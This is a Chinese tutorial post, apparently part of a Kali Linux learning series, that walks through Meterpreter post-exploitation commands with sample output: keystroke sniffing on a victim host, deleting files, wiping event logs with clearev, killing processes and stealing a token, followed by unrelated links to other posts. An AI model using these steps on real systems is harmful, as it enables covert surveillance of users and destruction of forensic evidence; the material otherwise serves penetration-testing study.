Kali学习 | 漏洞利用:4.4 控制Meterpreter

  • 介绍
  • 操作步骤

介绍

Meterpreter是Metasploit框架中的一个杀手铜,通常作为利用漏洞后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给用户一个控制通道。
当使用 Armitage、MSFCLI 或 MSFCONSOLE 获取到目标系统上的一个Meterpreter连接时,用户必须使用Meterpreter传递攻击载荷。
MSFCONSOLE用于管理用户的会话,而Meterpreter则是攻击载荷和渗透攻击交互

Meterpreter包括的一些常见命令如下所示。
help:查看帮助信息。
background:允许用户在后台Meterpreter会话N-
download:允许用户从入侵主机上下载文件。
upload:允许用户上传文件到入侵主机。
execute:允许用户在入侵主机上执行命令。
shell:允许用户在入侵主机上(仅是Windows主机)运行Windows shell命令。
session -i:允许用户切换会话。

操作步骤

(1)在MSFCONSOLE上启动一个活跃的会话。

(2)通过利用系统的用户启动登录键盘输入。执行命令如下所示:

meterpreter> keyscan start
Starting the keystroke sniffer..…

从输出的信息中可以看到键盘输入嗅探已启动。

(3)捕获漏洞系统用户的键盘输入。执行命令如下所示:

meterpreter> keyscan_dump
Dumping captured keystrokes...
<Return> www.baidu.com <Return> aaaa <Return> <Back> <Back> <Back> <Back> <Back>

以上输出的信息表示在漏洞系统中用户输入了www.baidu.com,aaaa及回车键、退出键。

(4)停止捕获漏洞系统用户的键盘输入。执行命令如下所示:

meterpreter> keyscan_stop
Stopping the keystroke sniffer..…

从输出的信息中可以看到键盘输入嗅探已停止。

(5)删除漏洞系统上的一个文件。执行命令如下所示:

meterpreter> del exploited.docx

(6)清除漏洞系统上的事件日志。执行命令如下所示:

meterpreter> clearev
[*]Wiping 57 records from Application..
[*]Wiping 107 records from System..
[*]Wiping O records from Security...

(7)查看正在运行的进程列表。执行命令如下所示:

输出的信息显示了漏洞系统中正在运行的所有进程,包括进程的ID号、进程名、系统架构、用户及运行程序的路径等。

(8)使用kill杀死漏洞系统中指定的进程号。执行命令如下所示:

meterpreter> kill 2040
Killing:2040

(9)尝试从漏洞系统窃取一个假冒令牌。执行命令如下所示:

meterpreter>steal_token

注意:使用不同的模块,Meterpreter中的命令是不同的。有些模块中,可能不存在以上命令。

参考书籍:《Kali Linux渗透测试技术详解》

Kali学习 | 漏洞利用:4.4 控制Meterpreter相关推荐

  1. Kali学习 | 漏洞扫描:3.2 使用Nessus扫描漏洞

    Kali学习 | 漏洞扫描:3.2 使用Nessus扫描漏洞 扫描本地漏洞 扫描网络漏洞 扫描指定Linux的系统漏洞 扫描指定Windows的系统漏洞 扫描本地漏洞 (1)新建名为Local Vul ...

  2. WAF绕过“小迪安全课堂笔记”信息收集,漏洞发现,漏洞利用,权限控制

    WAF绕过 思维导图(全) CC 攻击与 DDOS CC WAF 绕过-信息收集之反爬虫延时代理池技术 案例 Safedog-默认拦截机制分析绕过-未开CC WAF绕过-漏洞发现之代理池指纹被动探针 ...

  3. Kali WIndows 漏洞利用基础篇 (探索目标主机漏洞)

    通过使用Kali主机扫描工具Nmap和漏洞利用工具Msf来发现目标主机的系统漏洞和软件服务漏洞.因为很多教程只说了用什么漏洞去攻击,但是前提是该主机存在漏洞或者是该漏洞未被安装补丁(该Kali已经实体 ...

  4. kali metasploit 漏洞利用

    准备 1.安装metaploitable靶场 2.metaploitable靶场是ubuntu操作系统 清除IP sudo dhclient -r 重新获取IP sudo dhclient 重新分配一 ...

  5. Waf攻防-信息收集漏洞发现漏洞利用权限控制

    目录 WAF的介绍 1.什么是WAF 2.WAF的分类 软件型WAF 硬件型WAF 云 WAF 网站内置的WAF 3.WAF的判断 WAF的绕过 1.信息收集 介绍 信息收集常见检测 信息收集绕过wa ...

  6. 渗透测试漏洞利用入门总结

    渗透测试漏洞利用入门总结 漏洞利用 利用medusa获得远程服务的访问权限. 这些服务包括ssh.telnet.ftp.pc anywhere .vnc 对这些服务进行爆破的工具分别是medusa 和 ...

  7. Kali Linux渗透基础知识整理(三):漏洞利用

    漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透.网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的.顾名思义,利用漏洞,达到攻击的目的. Metasploit Framework rdeskt ...

  8. Kali Linux 秘籍 第六章 漏洞利用

    第六章 漏洞利用 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 一旦我们完成了漏洞扫描步骤,我们就了解了必要的知识 ...

  9. 分享SSRF漏洞的学习和利用

    前言 本文主要记录一次我们在复盘嘶吼网站渗透报告时遇到的一个SSRF漏洞.此漏洞并结合腾讯云的API接口,可以获取大量嘶吼服务器的敏感信息.利用这些敏感信息,又可以进行更为深入的渗透. 这篇文章将会发 ...

最新文章

  1. 当今主流分割网络有哪些?12篇文章一次带你看完
  2. ios ---常用的图片处理技术
  3. 求字符串中汉字的个数
  4. 黄聪:在C#中如何使用资源中的图片
  5. figure文本框乱码 matlab_Matlab给系统自动生成的窗体Figure1改名称
  6. 浅析Hadoop文件格式
  7. 又一国产开源微内核操作系统上线!源代码已开放下载
  8. 下载matlab安装包太慢_MATLAB 2020a商业数学中文版软件下载安装教程
  9. python list存储方式_python list存储
  10. gcn 图卷积神经网络_GCN图卷积网络入门详解
  11. Mysql Order By 字符串排序,mysql 字符串order by
  12. vue条形码,二维码,打印总结分享
  13. 歌曲剪辑软件测试自学,想做vlog?想剪视频?全网最良心的视频剪辑软件测评之入门篇...
  14. 仓库温度湿度控制措施_一般仓库的温湿度控制范围是多少合适?
  15. linux图片裁剪软件安卓版,照片裁剪软件下载-照片裁剪 安卓版v2.2-PC6安卓网
  16. mysql表的导入和导出
  17. 【大数据可视化分析】股吧帖子情感倾向及用户参与行为
  18. 微信GIF图保存到本地的方法
  19. 【第110期】游戏策划应聘必考题,90%的人没答对
  20. java实现催收系统对金额平均分,基本保证催收员的绩效一致

热门文章

  1. 用计算机弹出生僻字的歌,抖音生僻字是什么歌?抖音生僻字歌词注音完整版
  2. Node.js 4.x 入门实战视频课程【讲师辅导】-曾亮-专题视频课程
  3. 某考试系统逻辑漏洞打包#可改题改分数#查看大量信息
  4. centos发现网络连不上了,重启网络服务报错“systemctl status network.service” and “journalctl -xe” for details. [失败]
  5. 初识linux网络编程
  6. 手把手教你Linux虚拟机安装(超详细)
  7. css设置高度和宽度相同
  8. 经典算法:二叉树的建立
  9. linux 查看es进程,Linux---关闭Elasticsearch进程,并重新启动
  10. 高校学生信息管理系统